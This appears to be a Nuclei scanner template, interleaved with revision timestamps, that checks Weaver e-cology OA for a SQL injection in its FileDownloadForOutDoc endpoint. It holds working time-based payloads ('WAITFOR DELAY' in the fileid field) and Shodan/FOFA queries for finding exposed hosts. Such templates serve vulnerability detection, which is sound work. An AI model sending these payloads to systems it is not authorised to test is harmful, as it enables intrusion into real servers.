2023-08-11 05:44:21 +00:00
id : ecology-oa-file-sqli
info :
2023-08-11 10:15:25 +00:00
name : E-cology FileDownloadForOutDocSQL - SQL Injection
2023-08-11 05:44:21 +00:00
author : momika233
severity : high
description : |
e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
reference :
- https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata :
verified : true
2023-11-03 11:08:00 +00:00
max-request : 2
2023-08-11 05:44:21 +00:00
shodan-query : ecology_JSessionid
fofa-query : app="泛微-协同办公OA"
2023-08-11 10:15:25 +00:00
tags : ecology,ecology-oa,sqli
2023-08-11 05:44:21 +00:00
http :
- raw :
- |
2023-08-11 10:15:25 +00:00
@timeout : 15s
2023-08-11 05:44:21 +00:00
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
2023-08-11 05:46:44 +00:00
Host : {{Hostname}}
2023-08-11 05:44:21 +00:00
2023-08-11 10:15:25 +00:00
isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
2023-10-31 10:54:08 +00:00
- |
2023-11-03 10:53:09 +00:00
@timeout : 35s
2023-10-31 10:54:08 +00:00
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host : {{Hostname}}
isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15'
2023-08-11 05:44:21 +00:00
2023-10-31 10:54:08 +00:00
matchers-condition : and
2023-08-11 05:44:21 +00:00
matchers :
- type : dsl
dsl :
2023-11-03 10:53:09 +00:00
- 'duration_1>=7 && status_code_1 == 200'
2023-10-31 10:54:08 +00:00
- 'contains(header_1, "ecology_JSessionid=")'
2023-11-03 10:53:09 +00:00
- 'duration_2>=15 && status_code_2 == 200'
2023-10-31 10:54:08 +00:00
- 'contains(header_2, "ecology_JSessionid=")'
condition : and
2023-11-03 15:51:18 +00:00
# digest: 4b0a00483046022100ffe0b0bbdd67b8d72070bd4b0ebcbd93eaed08be7e825664b654c76340c93303022100d0dda143a17d2ccd9570880ebb09784be05f7e5862ad9ed5b60ea6ea2c7e9a15:922c64590222798bb761d5b6d8e72950